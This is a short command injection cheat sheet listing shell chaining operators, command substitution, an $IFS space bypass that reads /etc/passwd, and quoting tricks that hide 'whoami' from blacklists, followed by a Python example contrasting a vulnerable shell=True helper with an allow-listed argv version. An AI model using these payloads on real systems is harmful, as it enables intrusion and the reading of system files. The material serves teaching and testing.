Command Injection

Command injection is a vulnerability that allows the execution of arbitrary commands on the host server, potentially leading to unauthorized access, data theft, or system compromise.

Chaining and Invoking

Commands can be chained (on both Windows and Linux systems) using the following operators:

;    # Executes one command and then another
&    # Runs the first command in the background and then executes the second one
|    # Pipes the output of the first command as input to the second command
&&   # Executes the second command if the first command succeeds
||   # Executes the second command if the first command fails

It's also possible to inject commands via command substitution, where the output of a command is captured and used in another context:

$(command)    # Both Windows and Linux systems
`command`     # Only Linux systems

Bypasses

Space Bypass

It is possible to use the Internal Field Separator variable $IFS to avoid typing spaces in a command:

cat${IFS}/etc/passwd

Blacklisted Words

# Quotes
w'h'o'a'm'i'     # Both Windows and Linux systems
'w'h'o'a'm'i     # Only Linux systems
wh''oami         # Both Windows and Linux systems

# Backslashes
\w\h\o\a\m\i     # Only Linux systems
w\h\o\a\m\i      # Only Linux systems

# $()
wh$()oami        # Only Linux systems
wh$(echo oa)mi   # Only Linux systems

# ``
wh``oami         # Only Linux systems
wh`echo oa`mi    # Only Linux systems

# $@
wh$@oami         # Only Linux systems
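Added example (not part of the original cheat sheet): a hypothetical Python "ping a host" helper showing the pattern the tricks above target, user input concatenated into a shell=True string where the shell removes the quotes and honours the chaining operators before the program runs, next to the hardened form that allow-lists the value and passes it as one argv element with no shell at all. The function names, regex and sample inputs are assumptions.

```python
import re
import subprocess

# Constructed sample inputs: one benign host plus values carrying the
# chaining, $IFS and quoting tricks listed in this cheat sheet.
SAMPLE_INPUTS = [
    "example.com",
    "example.com;id",
    "example.com&&id",
    "example.com${IFS}id",
    "w'h'o'a'm'i",
]


def vulnerable_ping_command(host: str) -> str:
    """Hypothetical vulnerable pattern: raw input glued into a shell string.

    Run with shell=True, the shell parses ; & | && || $() and strips quotes
    before ping sees its arguments, so a blacklist of words such as
    'whoami' on the raw input cannot catch w'h'o'a'm'i.
    """
    return "ping -c 1 " + host


# Hardened variant: an allow-list on the value (hostname labels only), then
# an argv list executed without a shell, so metacharacters are never parsed.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def is_safe_hostname(value: str) -> bool:
    """True only for plain hostname/IP labels; every operator above is rejected."""
    return HOSTNAME_RE.fullmatch(value) is not None


def build_ping_argv(host: str) -> list:
    """argv for subprocess.run(..., shell=False); raises on disallowed input."""
    if not is_safe_hostname(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> int:
    # shell=False: the host is one literal argument and no shell ever reads it.
    return subprocess.run(build_ping_argv(host), capture_output=True, timeout=5).returncode


if __name__ == "__main__":
    for value in SAMPLE_INPUTS:
        verdict = "allowed" if is_safe_hostname(value) else "rejected"
        print(f"{value!r:24} -> {verdict}; shell string: {vulnerable_ping_command(value)!r}")
```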
